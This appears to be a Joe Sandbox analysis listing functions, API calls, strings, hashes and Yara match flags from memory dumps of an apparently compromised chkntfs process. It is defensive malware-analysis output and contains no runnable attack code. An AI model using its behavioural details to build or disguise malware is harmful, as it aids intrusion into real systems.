                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 58b18adaf626e27bbc0ea1df0b2936cdea5af946a51ca0e01aad9be9c4ecdb32
                                                                      • Instruction ID: d2de659317e75fdcd50d30926df48c02461a13b2d6a86b4cc4f9355ae0264ce3
                                                                      • Opcode Fuzzy Hash: 58b18adaf626e27bbc0ea1df0b2936cdea5af946a51ca0e01aad9be9c4ecdb32
                                                                      • Instruction Fuzzy Hash: C490023520545842F54071584414A5600258BE0309F55C012A01656A4D9729DE55B661
                                                                      Function 044C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 488ab902d3e6cfc913397a5dd3c09c79ec00cc8d0ea85681a3e82fdf87985897
                                                                      • Instruction ID: 3303e2970a30929784403d9e656b5f69ed5db50e84e1ccfc02a7aa3b510dd6eb
                                                                      • Opcode Fuzzy Hash: 488ab902d3e6cfc913397a5dd3c09c79ec00cc8d0ea85681a3e82fdf87985897
                                                                      • Instruction Fuzzy Hash: 1690023520141802F5807158441465A00158BE1305F95C016A0126664DCB19DB5977A1
                                                                      Function 044C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: be415b402bfe4b273ec75675bd2450fe0eed44d65e38fc61873aa7ea7bc929fc
                                                                      • Instruction ID: fc3b1f2e297d36ba244a0efc8c151f0c9de9d846799ad0a4c03323ebfe8eab3d
                                                                      • Opcode Fuzzy Hash: be415b402bfe4b273ec75675bd2450fe0eed44d65e38fc61873aa7ea7bc929fc
                                                                      • Instruction Fuzzy Hash: CD90023560541802F5507158442475600158BE0305F55C012A0125664D8759DB5576A1
                                                                      Function 044C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: dfbd76090cc83036327941be2578da9c2ca77f2e28379ff95daa6ca2c3c8e0f3
                                                                      • Instruction ID: fc210d6a4cb48c8c83a56e83c1d3eeb5e85df176cec1e80f9d811345167f152a
                                                                      • Opcode Fuzzy Hash: dfbd76090cc83036327941be2578da9c2ca77f2e28379ff95daa6ca2c3c8e0f3
                                                                      • Instruction Fuzzy Hash: 5E90023560551402F5007158452471610158BE0205F65C412A0525578D8799DA5165A2
                                                                      Function 044C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 358e81498320c5953b966aed3ca452914b55d1bd6ac3d5ed50079f5bf52d3cda
                                                                      • Instruction ID: ab6ca22db74ffa3640e7992a3cb265f0cad0f463256131fb236d257812107d72
                                                                      • Opcode Fuzzy Hash: 358e81498320c5953b966aed3ca452914b55d1bd6ac3d5ed50079f5bf52d3cda
                                                                      • Instruction Fuzzy Hash: CA90022524546102F550715C44146264015ABF0205F55C022A09155A4D8659D9556221
                                                                      Function 024A4460 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 024A453B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 8526a9164fea61521c6fa0bc7457002faf8335ab52a44f19ec57b3d3beb463da
                                                                      • Instruction ID: 1868192c81b11dd4e7a33f37c9218a69e802026ccfd67e8745f5ceb199215d59
                                                                      • Opcode Fuzzy Hash: 8526a9164fea61521c6fa0bc7457002faf8335ab52a44f19ec57b3d3beb463da
                                                                      • Instruction Fuzzy Hash: 6D31A0B1A00205BFD714DFA4CC80FEBBBB9FB88714F04452EEA595B240D770AA40CBA5
                                                                      Function 0249FECF Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: c2847feeaf1e8c90b86a4e789c4fde1a729c45061be6a2408e2d61f0c97adb61
                                                                      • Instruction ID: 386fea88e4222af655a19ee6432782a55a8501dd5a580ecec2a91b9a9dfb93ed
                                                                      • Opcode Fuzzy Hash: c2847feeaf1e8c90b86a4e789c4fde1a729c45061be6a2408e2d61f0c97adb61
                                                                      • Instruction Fuzzy Hash: 8F314376A0020A9FDB00DFD9D8809EFB7B9FF49304B10855AE516EB204D771EE058BA0
                                                                      Function 0249FED0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: 061bb97c7d17255cf171348275c9a901479dc002fbdcf7a5373d247828c9ced6
                                                                      • Instruction ID: 8e0eb561f1cb4216ff2c48a8ada0169397b261f818905b0f0d15c02e8cc13b9f
                                                                      • Opcode Fuzzy Hash: 061bb97c7d17255cf171348275c9a901479dc002fbdcf7a5373d247828c9ced6
                                                                      • Instruction Fuzzy Hash: FB314376A0020A9FDB00DFD9C8809EFB7B9FF49304B10855AE506E7204D771EE058BA0
                                                                      Function 02494FA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02494F72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID: j
                                                                      • API String ID: 2234796835-2137352139
                                                                      • Opcode ID: be920c9f479a91a4f88bcdf85411efb129fc45386ea76b9edb693cabae7da69a
                                                                      • Instruction ID: dfab085dedc03604d5864d6254e4e7d966678f1c52a938b18acd00f0d8b08316
                                                                      • Opcode Fuzzy Hash: be920c9f479a91a4f88bcdf85411efb129fc45386ea76b9edb693cabae7da69a
                                                                      • Instruction Fuzzy Hash: 55E0AB3B94044ADFCF01DD38D141A197720EB8173032503C9E81E8B388C773D81E8B46
                                                                      Function 02494F00 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02494F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction ID: 36c68d372d8f07dd6bdecadf4bcf0d4a438b65fd4a4a22026849cb2cc5ce657f
                                                                      • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction Fuzzy Hash: 390121B5E0020EABDF10DBE5DC51FEEB7B99B54308F0041AAE90997640F671E715CB91
                                                                      Function 024AA280 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02498CBE,00000010,?,?,?,00000044,?,00000010,02498CBE,?,?,?), ref: 024AA2E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: e080d54c05e7f5f7ac34d5b689cd143de01e92abce72a28ff273299c14727eec
                                                                      • Instruction ID: 9effcbae4f7163ca0919204f3c34d89bfc129d1a6f68a7c2421f8ed38a59feee
                                                                      • Opcode Fuzzy Hash: e080d54c05e7f5f7ac34d5b689cd143de01e92abce72a28ff273299c14727eec
                                                                      • Instruction Fuzzy Hash: CD01C0B2214508BFCB44DE89DC81EDB77ADAF8C714F418109BA19E3240D630F8518BA4
                                                                      Function 02489F50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02489F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 39f28bd57ac128d3e3fe73779f3a4c14b830114a0a30c60ba62e389f18e413e5
                                                                      • Instruction ID: be81d710362c0753be19ca2e74b147e1b9c21dfeff324862e6572d5180320408
                                                                      • Opcode Fuzzy Hash: 39f28bd57ac128d3e3fe73779f3a4c14b830114a0a30c60ba62e389f18e413e5
                                                                      • Instruction Fuzzy Hash: 55F0657379031436E23075EAAC02FDBB29D9B90B61F14042BF70DDB2C0D991B44146E5
                                                                      Function 02489F4D Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02489F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: dd5ee357178cc50599d99f635e94580111b3b68c9eee8eea461efdf19d769029
                                                                      • Instruction ID: 611dc128b0791caf5c4a63f2db2ba60836efe1e337b616ae6113af02ebf1f547
                                                                      • Opcode Fuzzy Hash: dd5ee357178cc50599d99f635e94580111b3b68c9eee8eea461efdf19d769029
                                                                      • Instruction Fuzzy Hash: 54F09B7278031076E23075A99C02FEB635D9FD0B50F24041AF60DEF2C0D9A278414BA4
                                                                      Function 024AA1F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,04C483C8,00000007,00000000,00000004,00000000,02494774,000000F4), ref: 024AA22F
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction ID: 980a681f4ad89fc7c00e4f93c5a3f874c0997d4095b03ef502223b05a70b7109
                                                                      • Opcode Fuzzy Hash: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction Fuzzy Hash: 76E065722042087BDA14EE99DC41FAB33ADEFC9750F40440AF909A7241D731B9118BB5
                                                                      Function 024AA1A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(024923B9,?,024A628F,024923B9,024A603F,024A628F,?,024923B9,024A603F,00001000,?,?,00000000), ref: 024AA1DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction ID: b0e211eef087fab48c8b0f0e591f23a6116b0939bfc8146e0258254e877cf001
                                                                      • Opcode Fuzzy Hash: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction Fuzzy Hash: 5BE065B22002087FD710EE99DC41FAB37AEEFC9720F40840AF908A7241D671B9108BB4
                                                                      Function 02498D00 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02498D2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 7fda123ae788be64ab2a9a01aa2374057dd2d38cafb237f5b7f9c9b16f9a9a40
                                                                      • Instruction ID: 91bbcdb22351aeb727bf1c7acb7c3f8baae95c780ab51be84f0560c9fe1484ee
                                                                      • Opcode Fuzzy Hash: 7fda123ae788be64ab2a9a01aa2374057dd2d38cafb237f5b7f9c9b16f9a9a40
                                                                      • Instruction Fuzzy Hash: 59E0DF312402082AEB20AAAC9C45B6333489F58A6CF484A62F85C9B7C1EA78F8024260
                                                                      Function 02498CFA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02498D2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 3851150aa64265f956e7ed99a6736c220be9650e4da4b604245bbead48572e97
                                                                      • Instruction ID: 2b92f52d474cf85d7de1e9189d9ced7cd03619a5d1c77073b795959435556cb9
                                                                      • Opcode Fuzzy Hash: 3851150aa64265f956e7ed99a6736c220be9650e4da4b604245bbead48572e97
                                                                      • Instruction Fuzzy Hash: 57E0203534020026EB20567CCC45BE337545F5576CF48477AF858DB7C1E67CE4424210
                                                                      Function 02498AEB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,024926C0,024A897F,024A603F,02492686), ref: 02498B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 5e0f9fef4c1580ce3005deb3f9a8f6e5f144d9dbdff5251f7972d4499cbe5165
                                                                      • Instruction ID: 66031de953cf5afa52a9e098928828345f421d4d370be9e26680dafb0d7e33b4
                                                                      • Opcode Fuzzy Hash: 5e0f9fef4c1580ce3005deb3f9a8f6e5f144d9dbdff5251f7972d4499cbe5165
                                                                      • Instruction Fuzzy Hash: E4E0CD71A503013EF751E6B48C02F7B27995B50704F04407AF84CDA2C3E965D4014B10
                                                                      Function 02498AF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,024926C0,024A897F,024A603F,02492686), ref: 02498B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 0d1ba9ecf89ddc10cfea6e392e50e82452ab718cec93230a1c7e6ed9aabf43ea
                                                                      • Instruction ID: 586530557619464104de65bde0b38cd75d4e8e8b22dfc193c75e74a3124c9fc4
                                                                      • Opcode Fuzzy Hash: 0d1ba9ecf89ddc10cfea6e392e50e82452ab718cec93230a1c7e6ed9aabf43ea
                                                                      • Instruction Fuzzy Hash: EAD05E716803053BF640F6A98C06F6B328D9B14B58F04407AB94CEB2C3FD65F40046A5
                                                                      Function 0249178B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0249179D
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction ID: b6614e9f2d3fb5ed8bbcf40106fdb385103ca2eb3ae08abf3d6079cbe9af668f
                                                                      • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction Fuzzy Hash: 6ED0A732B8060E34FE2141515C82FFE7F6C8B41A40F0001ABFB0CF40C1D681140506A5
                                                                      Function 044C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3f96acd5859786629a9fb8741f9e4a8d83dc88fb2acd8e11535b56869229263e
                                                                      • Instruction ID: ab502a8714d8b925dd8bc0c6e4d7122f74b52a5ad0a280c1b2f55a5aac7d82e7
                                                                      • Opcode Fuzzy Hash: 3f96acd5859786629a9fb8741f9e4a8d83dc88fb2acd8e11535b56869229263e
                                                                      • Instruction Fuzzy Hash: 00B04C799015D585EE51A760460861779106BD0705F19C066D2121651A4768D191E175

                                                                      Non-executed Functions

                                                                      Function 042A04DF Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 648541c48bfb2d7907bca4d84a78f54403aa3665ea34609fb1f4b7642c60b3de
                                                                      • Instruction ID: 28935ba6bda9b892d772e27dd23eead121cde6de09750948abd8d1586e8d59b7
                                                                      • Opcode Fuzzy Hash: 648541c48bfb2d7907bca4d84a78f54403aa3665ea34609fb1f4b7642c60b3de
                                                                      • Instruction Fuzzy Hash: AE411771B28B0E4FD36CEF6890816B6B3E1FB49344F50452DDD8AC3252EA70F8568785
                                                                      Function 0248EB14 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9969910ace3fd6408f402ad504e3731939b5115990ec8a76a0662ece0818d841
                                                                      • Instruction ID: 3af1e0f36c60f172e783649c516e1e983ceba5652383b705d6f13b7f753cf723
                                                                      • Opcode Fuzzy Hash: 9969910ace3fd6408f402ad504e3731939b5115990ec8a76a0662ece0818d841
                                                                      • Instruction Fuzzy Hash: 2DC08C13B040088284289C0A78042B0E2D4838B1A1E1023FBA808EF3448846C882A08C
                                                                      Function 042AE03C Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                      • API String ID: 0-3558027158
                                                                      • Opcode ID: d1247cc15040e493bca0900b6c0869cb41a0d51992c24b124d3f56c877f82fec
                                                                      • Instruction ID: accbe02f4ee6516e4768ebc676c087c1d2ff7c6d1ee65ad215afef6d5c4b3321
                                                                      • Opcode Fuzzy Hash: d1247cc15040e493bca0900b6c0869cb41a0d51992c24b124d3f56c877f82fec
                                                                      • Instruction Fuzzy Hash: 079160F04582988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                      Function 042A3AFB Relevance: 28.8, Strings: 23, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !#i1$#$6j$#i'6$'!#i$'0/ $'2/)$'66*$(!jl$(i>.$*j'6$/%'2$/)(i$/+'!$2#>2$2+*m$6*/%$7{vh$>+*j$>+*}$i.2+$il}7$j/+'${vh~
                                                                      • API String ID: 0-2202094905
                                                                      • Opcode ID: 8569638777c49d2e083df600593ea57bf7420dd0ce573459038614d7157df99a
                                                                      • Instruction ID: b65cabc1e30697827e79e2156af0f6ecf0d64ba55444a5ce8a036a790f6510ff
                                                                      • Opcode Fuzzy Hash: 8569638777c49d2e083df600593ea57bf7420dd0ce573459038614d7157df99a
                                                                      • Instruction Fuzzy Hash: B82166B054430CDFCF259F84E691BEEBB70FF10348F816289E9486B245C6358A56CB88
                                                                      Function 044C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
